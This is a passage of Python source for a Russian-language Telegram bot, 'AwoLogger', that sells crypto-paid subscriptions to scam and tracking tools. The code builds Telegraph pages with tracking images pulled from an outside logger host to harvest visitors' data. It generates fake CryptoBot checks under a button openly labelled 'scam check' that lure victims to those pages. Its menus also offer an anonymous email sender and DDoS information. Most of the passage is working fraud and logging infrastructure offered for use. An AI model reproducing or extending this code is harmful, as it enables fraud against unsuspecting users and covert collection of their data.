            chat_id, msg_id, parse_mode="HTML"
        )


async def get_crypto_price(currency):
    try:
        currency_map = {
            "USDT": "tether",
            "TON": "the-open-network",
            "SOL": "solana",
            "TRX": "tron",
            "GRAM": "gram",
            "BTC": "bitcoin",
            "ETH": "ethereum",
            "DOGE": "dogecoin",
            "LTC": "litecoin",
            "NOT": "notcoin",
            "TRUMP": "trump",
            "MELANIA": "melania",
            "PEPE": "pepe",
            "WIF": "dogwifhat",
            "BONK": "bonk",
            "MAJOR": "major",
            "MY": "mysterium",
            "DOGS": "dogs",
            "MEMHASH": "memhash",
            "BNB": "binancecoin",
            "HMSTR": "hamster-kombat",
            "CATI": "catizen",
            "USDC": "usd-coin"
        }
        coin_id = currency_map.get(currency)
        if not coin_id:
            logger.error(f"No CoinGecko ID for currency {currency}")
            return None
        
        async with aiohttp.ClientSession() as session:
            url = f"https://api.coingecko.com/api/v3/simple/price?ids={coin_id}&vs_currencies=usd"
            async with session.get(url) as resp:
                if resp.status != 200:
                    logger.error(f"Failed to fetch {currency} price: {resp.status}")
                    return None
                data = await resp.json()
                price = data.get(coin_id, {}).get('usd')
                if not price:
                    logger.error(f"No USD price for {currency}")
                    return None
                return float(price)
    except Exception as e:
        logger.error(f"Error fetching {currency} price: {e}")
        return None

async def create_crypto_payment(user_id, amount_usd, sub_type, currency):
    try:
        rate = await get_crypto_price(currency)
        if not rate:
            logger.error(f"Failed to get exchange rate for {currency}")
            return None, None
 
        amount_crypto = float(amount_usd) / rate
        amount_crypto = round(amount_crypto, 8)
        
        async with aiohttp.ClientSession() as session:
            url = f"https://pay.crypt.bot/api/createInvoice?asset={currency}&amount={amount_crypto}&description={sub_type}&hidden_message={user_id}"
            headers = {"Crypto-Pay-API-Token": CRYPTO_BOT_TOKEN}
            async with session.get(url, headers=headers) as resp:
                if resp.status == 200:
                    data = await resp.json()
                    invoice_id = data.get('result', {}).get('invoice_id')
                    pay_url = data.get('result', {}).get('pay_url')
                    return pay_url, invoice_id
                else:
                    logger.error(f"Failed to create invoice for {currency}: {resp.status}")
    except Exception as e:
        logger.error(f"Error creating crypto payment: {e}")
    return None, None

def get_cryptobot_check_amount(message):
    user_id = message.from_user.id
    if str(user_id) not in user_data or user_data[str(user_id)]['type'] != 'cryptobot_check':
        return
    
    try:
        amount = float(message.text)
        if amount <= 0:
            raise ValueError("Amount must be positive")
        
        user_data[str(user_id)]['check_amount'] = amount
        user_data[str(user_id)]['title'] = "AwoLogger"
        user_data[str(user_id)]['text'] = "Жду тебя тут @AwoLoggerBot!"
        bot.delete_message(message.chat.id, message.message_id)
        bot.edit_message_text(
            "<b>⏳ Создаю чек...</b>",
            message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
        )
        asyncio.run(save_users()) 
        asyncio.run(create_cryptobot_check(message.chat.id, user_id, user_data[str(user_id)]['msg_id']))
    
    except ValueError:
        bot.delete_message(message.chat.id, message.message_id)
        bot.edit_message_text(
            "<b>❌ Неверный формат суммы!</b>\n\n<i>⚠️ Пример: 100.50</i>",
            message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
        )
        bot.register_next_step_handler_by_chat_id(message.chat.id, get_cryptobot_check_amount)
        
        
async def create_cryptobot_check(chat_id, user_id, msg_id):
    try:
        async with aiohttp.ClientSession() as session:
            async with session.get("https://awo-logger.vercel.app/api/v1") as resp:
                if resp.status != 200:
                    bot.edit_message_text(
                        "<b>❌ Ошибка при получении изображения!</b>",
                        chat_id, msg_id, parse_mode="HTML"
                    )
                    return
                img_data = await resp.json()
                image_url = img_data.get('url')
                if not image_url:
                    bot.edit_message_text(
                        "<b>❌ Не удалось получить URL изображения!</b>",
                        chat_id, msg_id, parse_mode="HTML"
                    )
                    return
                path_match = re.search(r'/api/v2/(.+)', image_url)
                image_path = path_match.group(1) if path_match else image_url.split("/")[-1]
                user_data[str(user_id)]['image_path'] = image_path
                logger.info(f"Created CryptoBot check for user {user_id} with image_path: {image_path}")

        content = f'<img src="{image_url}"><br><b>{user_data[str(user_id)]["text"]}</b>'
        response = telegraph.create_page(
            title=user_data[str(user_id)]['title'],
            html_content=content,
            author_name="@AwoLoggerBot",
            author_url="https://t.me/AwoLoggerBot"
        )
        
        tg_url = f"https://telegra.ph/{response['path']}"
        check_id = generate_random_id(16)
        
        checks[check_id] = {
            'user_id': user_id,
            'amount': user_data[str(user_id)]['check_amount'],
            'telegraph_url': tg_url,
            'image_path': image_path
        }
        await save_checks()
        logger.info(f"Saved check {check_id} to checks.json: {checks[check_id]}")
        
        amount = user_data[str(user_id)]['check_amount']
        rub_amount = amount * USDT_TO_RUB_RATE
        check_image_url = f"https://imggen.send.tg/checks/image?asset=USDT&asset_amount={amount}&fiat=RUB&fiat_amount={rub_amount}&main=asset&v2"
        
        markup = InlineKeyboardMarkup()
        markup.add(InlineKeyboardButton("💶 Скам чек", url=f"{CRYPTOBOT_LINK}?start={check_id}"))
        markup.add(InlineKeyboardButton("◀️ Назад", callback_data="cryptobot_logger"))
        
        text = f"""
📜 <b>Чек успешно создан!</b>
🔥 <b>Заголовок:</b> <i>{user_data[str(user_id)]['title']}</i>
🔥 <b>Текст:</b> <i>{user_data[str(user_id)]['text']}</i>
🔗 <b>Ссылка:</b> <i>{tg_url}</i>
💳 <b>Сумма:</b> <i>{amount:.1f} USDT</i>
"""
        bot.delete_message(chat_id, msg_id)
        sent_message = bot.send_photo(chat_id, check_image_url, caption=text, parse_mode="HTML", reply_markup=markup)
        user_data[str(user_id)]['check_message_id'] = sent_message.message_id
        logger.info(f"Sent check {check_id} to user {user_id} with link: {CRYPTOBOT_LINK}?start={check_id}")
        
        if 'pages' not in user_data[str(user_id)]:
            user_data[str(user_id)]['pages'] = []
        user_data[str(user_id)]['pages'].append({
            'title': user_data[str(user_id)]['title'],
            'url': tg_url,
            'created_at': datetime.now().isoformat()
        })
        await save_users()
    
    except Exception as e:
        logger.error(f"Error creating CryptoBot check: {e}")
        bot.edit_message_text(
            f"<b>🔴 Ошибка при создании чека:</b> <i>{str(e)}</i>",
            chat_id, msg_id, parse_mode="HTML"
        )

def admin_panel():
    markup = InlineKeyboardMarkup(row_width=2)
    buttons = [
        ("➕ Выдать подписку", "admin_give_sub"),
        ("➖ Отменить подписку", "admin_revoke_sub"),
        ("📊 Статистика", "admin_stats"),
        ("📩 Рассылка", "admin_mailing"),
        ("🚫 Забанить", "admin_ban_user"),
        ("✅ Разбанить", "admin_unban_user"),
        ("🎁 Скидки", "discounts_menu")
    ]
    for text, data in buttons:
        markup.add(InlineKeyboardButton(text, callback_data=data))
    markup.add(InlineKeyboardButton("🔙 Назад", callback_data="back_to_main"))
    
    return "<b>👑 Админ-панель</b>", markup

def discounts_menu():
    markup = InlineKeyboardMarkup(row_width=2)
    markup.add(
        InlineKeyboardButton("➕ Добавить скидку", callback_data="admin_add_discount"),
        InlineKeyboardButton("➖ Удалить скидку", callback_data="admin_remove_discount")
    )
    markup.add(InlineKeyboardButton("🔙 Назад", callback_data="admin_panel"))
    
    if not discounts:
        text = "<b>🎁 Скидки</b>\n\n<i>📌 Нет активных скидок.</i>"
    else:
        text = "<b>🎁 Активные скидки</b>\n\n"
        for discount_id, data in discounts.items():
            end_date = datetime.fromisoformat(data['end_date']).strftime('%d.%m.%y %H:%M')
            text += f"🔖 <b>ID: {discount_id}</b>\n" \
                    f"   ├─ <b>Процент:</b> <i>{data['percent']}%</i>\n" \
                    f"   └─ <b>До:</b> <i>{end_date}</i>\n\n"
    
    return text, markup
    
def admin_mailing_start(message):
    if message.from_user.id not in ADMIN_IDS:
        return
    
    try:
        admin_id = str(message.from_user.id)
        if admin_id not in user_data:
            user_data[admin_id] = {}
        user_data[admin_id]['mailing_text'] = message.text
        asyncio.run(save_users())
        markup = InlineKeyboardMarkup(row_width=2)
        markup.add(
            InlineKeyboardButton("✅ Подтвердить", callback_data=f"confirm_mailing_{admin_id}"),
            InlineKeyboardButton("❌ Отменить", callback_data=f"cancel_mailing_{admin_id}")
        )
        bot.send_message(
            message.chat.id,
            f"<b>📩 Подтвердите рассылку:</b>\n\n<i>{message.text}</i>",
            parse_mode="HTML", reply_markup=markup
        )
    except Exception as e:
        bot.send_message(
            message.chat.id,
            f"<b>❌ Ошибка:</b> <i>{str(e)}</i>",
            parse_mode="HTML"
        )

def admin_ban_user(message):
    if message.from_user.id not in ADMIN_IDS:
        return
    try:
        target_id = str(int(message.text))
        if target_id in banned_users:
            bot.send_message(
                message.chat.id,
                f"<b>❌ Пользователь {target_id} уже забанен!</b>",
                parse_mode="HTML"
            )
            return
        banned_users.add(target_id)
        asyncio.run(save_bans())
        bot.send_message(
            message.chat.id,
            f"<b>✅ Пользователь {target_id} забанен!</b>",
            parse_mode="HTML"
        )
        try:
            bot.send_message(
                int(target_id),
                "<b>🚫 Вы были забанены администратором и не можете использовать бота!</b>",
                parse_mode="HTML"
            )
        except Exception as e:
            logger.error(f"Failed to notify banned user {target_id}: {e}")
    except ValueError:
        bot.send_message(
            message.chat.id,
            "<b>❌ Неверный формат!</b> <i>Введите ID пользователя (только цифры).</i>",
            parse_mode="HTML"
        )

def admin_unban_user(message):
    if message.from_user.id not in ADMIN_IDS:
        return
    try:
        target_id = str(int(message.text))
        if target_id not in banned_users:
            bot.send_message(
                message.chat.id,
                f"<b>❌ Пользователь {target_id} не забанен!</b>",
                parse_mode="HTML"
            )
            return
        banned_users.remove(target_id)
        asyncio.run(save_bans())
        bot.send_message(
            message.chat.id,
            f"<b>✅ Пользователь {target_id} разбанен!</b>",
            parse_mode="HTML"
        )
        try:
            bot.send_message(
                int(target_id),
                "<b>✅ Вы были разбанены и можете снова использовать бота!</b>",
                parse_mode="HTML"
            )
        except Exception as e:
            logger.error(f"Failed to notify unbanned user {target_id}: {e}")
    except ValueError:
        bot.send_message(
            message.chat.id,
            "<b>❌ Неверный формат!</b> <i>Введите ID пользователя (только цифры).</i>",
            parse_mode="HTML"
        )

async def save_ags():
    try:
        async with aiofiles.open('ags.json', 'w') as f:
            await f.write(json.dumps(list(agreed_users)))
        logger.info("Successfully saved ags.json")
    except Exception as e:
        logger.error(f"Failed to save ags.json: {e}")

async def send_mailing(admin_id):
    success_count = 0
    fail_count = 0
    admin_id = str(admin_id)
    mailing_text = user_data.get(admin_id, {}).get('mailing_text')
    
    if not mailing_text:
        logger.error(f"No mailing text found for admin {admin_id}")
        return 0, 0
    
    for user_id in user_data.keys():
        try:
            bot.send_message(
                int(user_id),
                mailing_text,
                parse_mode="HTML"
            )
            success_count += 1
        except Exception as e:
            logger.error(f"Failed to send mailing to {user_id}: {e}")
            fail_count += 1
    return success_count, fail_count

async def check_discounts():
    while True:
        try:
            now = datetime.now()
            expired_discounts = []
            for discount_id, data in discounts.items():
                end_date = datetime.fromisoformat(data['end_date'])
                if now >= end_date:
                    expired_discounts.append(discount_id)
            
            for discount_id in expired_discounts:
                percent = discounts[discount_id]['percent']
                end_date = datetime.fromisoformat(discounts[discount_id]['end_date']).strftime('%d.%m.%y %H:%M')
                logger.info(f"Removing expired discount {discount_id}: {percent}% ended at {end_date}")
                del discounts[discount_id]
            
            if expired_discounts:
                await save_discounts()
                logger.info(f"Removed {len(expired_discounts)} expired discounts")
                
        except Exception as e:
            logger.error(f"Error checking discounts: {e}")
        await asyncio.sleep(30) 

@bot.callback_query_handler(func=lambda call: True)
def handle_callback(call):
    user_id = call.from_user.id
    chat_id = call.message.chat.id
    try:
        if call.data == "anonymous_email":
            if not check_subscription(user_id):
                markup = InlineKeyboardMarkup()
                markup.add(InlineKeyboardButton("💸 Купить подписку", callback_data="buy_sub"))
                bot.edit_message_text(
                    "<b>🔒 Для использования анонимного отправителя требуется подписка!</b>",
                    chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup
                )
                return
            text, markup = anonymous_email_menu()
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        if call.data == "start_email_input":
            if not check_subscription(user_id):
                markup = InlineKeyboardMarkup()
                markup.add(InlineKeyboardButton("💸 Купить подписку", callback_data="buy_sub"))
                bot.edit_message_text(
                    "<b>🔒 Для использования анонимного отправителя требуется подписка!</b>",
                    chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup
                )
                bot.answer_callback_query(call.id)
                return

            email_data[str(user_id)] = {
                'type': 'email_subject',
                'msg_id': None 
            }
            msg = bot.send_message(
                chat_id,
                "<b>📌 ✏️ Введите заголовок сообщения:</b>",
                parse_mode="HTML"
            )
            email_data[str(user_id)]['msg_id'] = msg.message_id
            bot.register_next_step_handler_by_chat_id(chat_id, get_email_subject)
            bot.answer_callback_query(call.id)
            return
        elif call.data == "back_to_email_subject":
            msg = bot.send_message(chat_id, "<b>📌 Введите заголовок сообщения:</b>", parse_mode="HTML")
            user_data[str(user_id)] = {'msg_id': msg.message_id, 'type': 'email_subject'}
            asyncio.run(save_users())
            bot.register_next_step_handler_by_chat_id(chat_id, get_email_subject)
            return
        if call.data == "back_to_main":
            text, markup = main_menu(user_id)
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "ddos_info":
            text, markup = ddos_info()
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "profile":
            text, markup = profile_menu(user_id)
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "about_bot":
            text, markup = about_bot_menu()
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "buy_sub":
            text, markup = subscription_menu()
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "xrocket_logger":
            text, markup = xrocket_logger_menu()
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "cryptobot_logger":
            text, markup = cryptobot_logger_menu()
            if str(user_id) in user_data:
                if 'check_message_id' in user_data[str(user_id)]:
                    try:
                        bot.delete_message(chat_id, user_data[str(user_id)]['check_message_id'])
                        del user_data[str(user_id)]['check_message_id']
                        asyncio.run(save_users())
                    except Exception as e:
                        logger.error(f"Failed to delete check photo message for user {user_id}: {e}")
                if 'gift_message_id' in user_data[str(user_id)]:
                    try:
                        bot.delete_message(chat_id, user_data[str(user_id)]['gift_message_id'])
                        del user_data[str(user_id)]['gift_message_id']
                        asyncio.run(save_users())
                    except Exception as e:
                        logger.error(f"Failed to delete gift photo message for user {user_id}: {e}")
            bot.send_message(chat_id, text, parse_mode="HTML", reply_markup=markup)
        elif call.data == "loggers_menu":
            text, markup = loggers_menu()
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "create_check":
            msg = bot.send_message(chat_id, "<b>💸 Введите сумму чека:</b>\n\n<i>⚠️ Пример: 100.50</i>", parse_mode="HTML")
            user_data[str(user_id)] = {'msg_id': msg.message_id, 'type': 'check_amount'}
            asyncio.run(save_users())
            bot.register_next_step_handler_by_chat_id(chat_id, get_check_amount)
            return
        elif call.data == "create_cryptobot_check":
            msg = bot.send_message(chat_id, "<b>💸 Введите сумму чека:</b>\n\n<i>⚠️ Пример: 100.50</i>", parse_mode="HTML")
            user_data[str(user_id)] = {'msg_id': msg.message_id, 'type': 'cryptobot_check'}
            asyncio.run(save_users())
            bot.register_next_step_handler_by_chat_id(chat_id, get_cryptobot_check_amount)
            return
        elif call.data == "create_gift":
            msg = bot.send_message(chat_id, "<b>🎁 Введите сумму подарка:</b>\n\n<i>⚠️ Пример: 100.50</i>", parse_mode="HTML")
            user_data[str(user_id)] = {'msg_id': msg.message_id, 'type': 'cryptobot_gift'}
            asyncio.run(save_users())
            bot.register_next_step_handler_by_chat_id(chat_id, get_cryptobot_gift_amount)
            return
        elif call.data.startswith("sub_"):
            sub_type = call.data.split("_")[1]
            text, markup = currency_menu(sub_type)
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        
        elif call.data.startswith("currency_"):
            _, sub_type, currency = call.data.split("_")
            amounts = {
                "week": ("0.48", timedelta(days=7)),
                "month": ("1.62", timedelta(days=30)),
                "year": ("4.75", timedelta(days=365)),
                "forever": ("11.40", timedelta(days=365*100))
            }
            if sub_type in amounts:
                amount_usd, delta = amounts[sub_type]
                active_discount = None
                now = datetime.now()
                for discount_id, data in discounts.items():
                    if now < datetime.fromisoformat(data['end_date']):
                        active_discount = data['percent']
                        break
                if active_discount:
                    discount_factor = 1 - active_discount / 100
                    amount_usd = float(amount_usd) * discount_factor
                    amount_usd = f"{amount_usd:.2f}"
                
                rate = asyncio.run(get_crypto_price(currency))
                if not rate:
                    bot.answer_callback_query(call.id, f"❌ Не удалось получить курс для {currency}!", show_alert=True)
                    return
                
                amount_crypto = float(amount_usd) / rate
                amount_crypto = round(amount_crypto, 8)
                
                user_data[str(user_id)]['sub_type'] = sub_type
                user_data[str(user_id)]['currency'] = currency
                user_data[str(user_id)]['amount'] = amount_usd
                user_data[str(user_id)]['delta'] = delta.total_seconds() / (24 * 3600)
                asyncio.run(save_users())
                
                pay_url, invoice_id = asyncio.run(create_crypto_payment(user_id, amount_usd, sub_type, currency))
                if pay_url and invoice_id:
                    user_data[str(user_id)]['invoice_id'] = invoice_id
                    asyncio.run(save_users())
                    markup = InlineKeyboardMarkup()
                    markup.add(InlineKeyboardButton("💳 Оплатить", url=pay_url))
                    markup.add(InlineKeyboardButton("🔄 Проверить", callback_data=f"check_payment_{invoice_id}"))
                    markup.add(InlineKeyboardButton("🔙 Назад", callback_data="buy_sub"))
                    discount_text = f"\n🎁 <b>Скидка:</b> <i>{active_discount}%</i>" if active_discount else ""
                    text = f"<b>💳 Оплатите {amount_crypto:.8f} {currency} (~{amount_usd} USD) для подписки:</b> <i>{sub_type}</i>{discount_text}\n\n<b>🔗 Ссылка для оплаты:</b>"
                    bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
                else:
                    bot.answer_callback_query(call.id, "❌ Ошибка при создании платежа!", show_alert=True)
                    
        elif call.data.startswith("check_payment_"):
            invoice_id = call.data.split("_")[2]
            status, amount, currency = asyncio.run(check_invoice_status(invoice_id))
            if status == "paid":
                sub_type = user_data[str(user_id)]['sub_type']
                delta = timedelta(days=user_data[str(user_id)]['delta'])
                expire_date = datetime.now() + delta
                subscriptions[str(user_id)] = expire_date.isoformat()
                asyncio.run(save_subs())
                limit_notified.discard(str(user_id))
                bot.edit_message_text(
                    f"<b>🎉 Подписка активирована!</b> <i>Действует до {expire_date.strftime('%Y-%m-%d')}</i>",
                    chat_id, call.message.message_id, parse_mode="HTML", reply_markup=create_back_button()
                )
                bot.send_message(
                    user_id,
                    f"<b>🎉 Подписка активирована!</b> <i>Действует до {expire_date.strftime('%Y-%m-%d')}</i>",
                    parse_mode="HTML"
                )
            else:
                markup = InlineKeyboardMarkup()
                markup.add(InlineKeyboardButton("💳 Оплатить снова", callback_data=f"retry_payment_{invoice_id}"))
                markup.add(InlineKeyboardButton("🔙 Назад", callback_data="buy_sub"))
                bot.edit_message_text(
                    "<b>❌ Оплата не найдена. Оплатите.</b>\n\n<i>Проверьте, завершили ли вы оплату, или попробуйте снова.</i>",
                    chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup
                )
        
        elif call.data.startswith("retry_payment_"):
            invoice_id = call.data.split("_")[2]
            sub_type = user_data[str(user_id)]['sub_type']
            currency = user_data[str(user_id)]['currency']
            amount = user_data[str(user_id)]['amount']
            pay_url, new_invoice_id = asyncio.run(create_crypto_payment(user_id, amount, sub_type, currency))
            if pay_url and new_invoice_id:
                user_data[str(user_id)]['invoice_id'] = new_invoice_id
                asyncio.run(save_users())
                markup = InlineKeyboardMarkup()
                markup.add(InlineKeyboardButton("💳 Оплатить", url=pay_url))
                markup.add(InlineKeyboardButton("🔄 Проверить", callback_data=f"check_payment_{new_invoice_id}"))
                markup.add(InlineKeyboardButton("🔙 Назад", callback_data="buy_sub"))
                text = f"<b>💳 Оплатите {amount} {currency} для подписки:</b> <i>{sub_type}</i>\n\n<b>🔗 Новая ссылка для оплаты:</b>"
                bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
            else:
                bot.answer_callback_query(call.id, "❌ Ошибка при создании нового платежа!", show_alert=True)
                
        elif call.data == "telegraph_logger":
            markup = InlineKeyboardMarkup(row_width=2)
            markup.add(
                InlineKeyboardButton("📝 Создать ссылку", callback_data="create_telegraph"),
                InlineKeyboardButton("📋 Мои страницы", callback_data="view_pages")
            )
            markup.add(InlineKeyboardButton("🔙 Назад", callback_data="back_to_main"))
            text = "<b>📜 Логгер Telegraph</b>\n\n<i>Создайте страницу для сбора данных или просмотрите созданные.</i> <b>🔓 Доступно без подписки!</b>"
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "create_telegraph":
            msg = bot.send_message(chat_id, "<b>📝 Введите заголовок статьи:</b>", parse_mode="HTML")
            user_data[str(user_id)] = {'msg_id': msg.message_id, 'type': 'telegraph'}
            asyncio.run(save_users())
            bot.register_next_step_handler_by_chat_id(chat_id, get_title)
            return
        elif call.data == "view_pages":
            pages = user_data.get(str(user_id), {}).get('pages', [])
            if not pages:
                text = "<b>📋 У вас нет созданных страниц.</b>\n\n<i>Создайте новую страницу в меню Логгер Telegraph!</i>"
                markup = create_back_button("telegraph_logger")
            else:
                text = "<b>📋 Ваши страницы:</b>\n\n"
                for i, page in enumerate(pages, 1):
                    text += f"""
{i}. <b>Заголовок:</b> <i>{page['title']}</i>
   <b>Ссылка:</b> <a href="{page['url']}">Открыть</a>
"""
                markup = create_back_button("telegraph_logger")
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "admin_panel" and user_id in ADMIN_IDS:
            text, markup = admin_panel()
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "admin_give_sub" and user_id in ADMIN_IDS:
            msg = bot.send_message(chat_id, "<b>👑 Введите ID пользователя и срок подписки (в днях):</b>\n\n<i>Формат:</i> <code>123456789 30</code>", parse_mode="HTML")
            bot.register_next_step_handler(msg, admin_give_sub)
            return
        elif call.data == "admin_revoke_sub" and user_id in ADMIN_IDS:
            msg = bot.send_message(chat_id, "<b>👑 Введите ID пользователя для отмены подписки:</b>", parse_mode="HTML")
            bot.register_next_step_handler(msg, admin_revoke_sub)
            return
        elif call.data == "admin_ban_user" and user_id in ADMIN_IDS:
            msg = bot.send_message(chat_id, "<b>👑 Введите ID пользователя для бана:</b>", parse_mode="HTML")
            bot.register_next_step_handler(msg, admin_ban_user)
            return
        elif call.data == "admin_unban_user" and user_id in ADMIN_IDS:
            msg = bot.send_message(chat_id, "<b>👑 Введите ID пользователя для разбана:</b>", parse_mode="HTML")
            bot.register_next_step_handler(msg, admin_unban_user)
            return
        elif call.data == "admin_stats" and user_id in ADMIN_IDS:
            active_subs = sum(1 for sub in subscriptions.values() if datetime.fromisoformat(sub) > datetime.now())
            total_users = len(user_data)
            text = f"""
<b>📊 Статистика бота:</b>
├─ <b>Всего пользователей:</b> <i>{total_users}</i>
├─ <b>Активных подписок:</b> <i>{active_subs}</i>
└─ <b>Неактивных подписок:</b> <i>{len(subscriptions) - active_subs}</i>
"""
            markup = create_back_button()
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data.startswith("view_log_") and user_id in ADMIN_IDS:
            log_id = call.data.split("view_log_")[1]
            if log_id in link_data:
                log_data = link_data[log_id]['data']
                asyncio.run(send_log_info(user_id, log_data, admin=True))
                bot.answer_callback_query(call.id, "Лог отправлен!")
                return
            else:
                bot.answer_callback_query(call.id, "Лог не найден!", show_alert=True)
                return
        elif call.data == "check_subscription":
            if check_subscriptions(user_id):
                text, markup = main_menu(user_id)
                bot.delete_message(chat_id, call.message.message_id)
                bot.send_message(chat_id, text, parse_mode="HTML", reply_markup=markup)
            else:
                send_subscription_prompt(chat_id)
                bot.answer_callback_query(call.id, "❌ Пожалуйста, подпишитесь на канал и чат!", show_alert=True)
        elif call.data == "admin_mailing" and user_id in ADMIN_IDS:
            msg = bot.send_message(chat_id, "<b>📩 Введите текст рассылки:</b>", parse_mode="HTML")
            bot.register_next_step_handler(msg, admin_mailing_start)
            return
        elif call.data.startswith("confirm_mailing_") and user_id in ADMIN_IDS:
            admin_id = call.data.split("_")[2]
            success, fail = asyncio.run(send_mailing(admin_id))
            bot.edit_message_text(
                f"<b>📩 Рассылка завершена!</b>\n\n<i>Успешно отправлено: {success}\nНе удалось отправить: {fail}</i>",
                chat_id, call.message.message_id, parse_mode="HTML", reply_markup=create_back_button()
            )
            admin_id = str(admin_id)
            if admin_id in user_data and 'mailing_text' in user_data[admin_id]:
                del user_data[admin_id]['mailing_text']
                asyncio.run(save_users())
        elif call.data.startswith("cancel_mailing_") and user_id in ADMIN_IDS:
            admin_id = call.data.split("_")[2]
            bot.edit_message_text(
                "<b>📩 Рассылка отменена.</b>",
                chat_id, call.message.message_id, parse_mode="HTML", reply_markup=create_back_button()
            )
            admin_id = str(admin_id)
            if admin_id in user_data and 'mailing_text' in user_data[admin_id]:
                del user_data[admin_id]['mailing_text']
                asyncio.run(save_users())
        elif call.data == "discounts_menu" and user_id in ADMIN_IDS:
            text, markup = discounts_menu()
            bot.edit_message_text(text, chat_id, call.message.message_id, parse_mode="HTML", reply_markup=markup)
        elif call.data == "admin_add_discount" and user_id in ADMIN_IDS:
            msg = bot.send_message(
                chat_id,
                "<b>🎁 Введите данные скидки:</b>\n\n"
                "<i>Формат: [дата_время] [процент]</i>\n"
                "<i>Пример: 24.04.25:20:00 20</i>",
                parse_mode="HTML"
            )
            bot.register_next_step_handler(msg, admin_add_discount)
            return
        elif call.data == "admin_remove_discount" and user_id in ADMIN_IDS:
            msg = bot.send_message(
                chat_id,
                "<b>🗑 Введите ID скидки для удаления:</b>\n\n"
                "<i>Введите ID из списка скидок.</i>",
                parse_mode="HTML"
            )
            bot.register_next_step_handler(msg, admin_remove_discount)
            return
        elif call.data.startswith("confirm_remove_discount_") and user_id in ADMIN_IDS:
            discount_id = call.data.split("_")[3]
            confirm_remove_discount(discount_id, chat_id, call.message.message_id)
            bot.answer_callback_query(call.id)
            return
        else:
            return
    
    except Exception as e:
        logger.error(f"Callback error: {e}")
        bot.answer_callback_query(call.id, "❌ Произошла ошибка!", show_alert=True)
        
def get_check_amount(message):
    user_id = message.from_user.id
    if str(user_id) not in user_data or user_data[str(user_id)]['type'] != 'check_amount':
        return
    
    try:
        amount = float(message.text)
        if amount <= 0:
            raise ValueError("Amount must be positive")
        
        user_data[str(user_id)]['check_amount'] = amount
        user_data[str(user_id)]['title'] = "AwoLogger"
        user_data[str(user_id)]['text'] = "Жду тебя тут @AwoLoggerBot!"
        bot.delete_message(message.chat.id, message.message_id)
        bot.edit_message_text(
            "<b>⏳ Создаю чек...</b>",
            message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
        )
        asyncio.run(save_users())
        asyncio.run(create_check_page(message.chat.id, user_id, user_data[str(user_id)]['msg_id']))
    
    except ValueError:
        bot.delete_message(message.chat.id, message.message_id)
        bot.edit_message_text(
            "<b>❌ Неверный формат суммы!</b>\n\n<i>⚠️ Пример: 100.50</i>",
            message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
        )
        bot.register_next_step_handler_by_chat_id(message.chat.id, get_check_amount)

def get_check_title(message):
    user_id = message.from_user.id
    if str(user_id) not in user_data or user_data[str(user_id)]['type'] != 'check_telegraph':
        return
    
    user_data[str(user_id)]['title'] = message.text
    bot.delete_message(message.chat.id, message.message_id)
    bot.edit_message_text(
        "<b>📝 Введите текст статьи для чека:</b>",
        message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
    )
    asyncio.run(save_users())
    bot.register_next_step_handler_by_chat_id(message.chat.id, get_check_text)

def get_check_text(message):
    user_id = message.from_user.id
    if str(user_id) not in user_data or user_data[str(user_id)]['type'] != 'check_telegraph':
        return
    
    user_data[str(user_id)]['text'] = message.text
    bot.delete_message(message.chat.id, message.message_id)
    bot.edit_message_text(
        "<b>⏳ Создаю чек...</b>",
        message.chat.id, user_data[str(user_id)]['msg_id'], parse_mode="HTML"
    )
    asyncio.run(save_users())
    asyncio.run(create_check_page(message.chat.id, user_id, user_data[str(user_id)]['msg_id']))

async def create_check_page(chat_id, user_id, msg_id):
    try:
        async with aiohttp.ClientSession() as session:
            async with session.get("https://awo-logger.vercel.app/api/v1") as resp:
                if resp.status != 200:
                    bot.edit_message_text(
                        "<b>❌ Ошибка при получении изображения!</b>",
                        chat_id, msg_id, parse_mode="HTML"
                    )
                    return
                img_data = await resp.json()
                image_url = img_data.get('url')
                if not image_url:
                    bot.edit_message_text(
                        "<b>❌ Не удалось получить URL изображения!</b>",
                        chat_id, msg_id, parse_mode="HTML"
                    )
                    return
                path_match = re.search(r'/api/v2/(.+)', image_url)
                image_path = path_match.group(1) if path_match else image_url.split("/")[-1]
                user_data[str(user_id)]['image_path'] = image_path
                logger.info(f"Created check for user {user_id} with image_path: {image_path}")

        content = f'<img src="{image_url}"><br>{user_data[str(user_id)]["text"]}'
        response = telegraph.create_page(
            title=user_data[str(user_id)]['title'],
            html_content=content,
            author_name="@AwoLoggerBot",
            author_url="https://t.me/AwoLoggerBot"
        )
        
        tg_url = f"https://telegra.ph/{response['path']}"
        check_id = generate_random_id(16)
        
        checks[check_id] = {
            'user_id': user_id,
            'amount': user_data[str(user_id)]['check_amount'],
            'telegraph_url': tg_url,
            'image_path': image_path
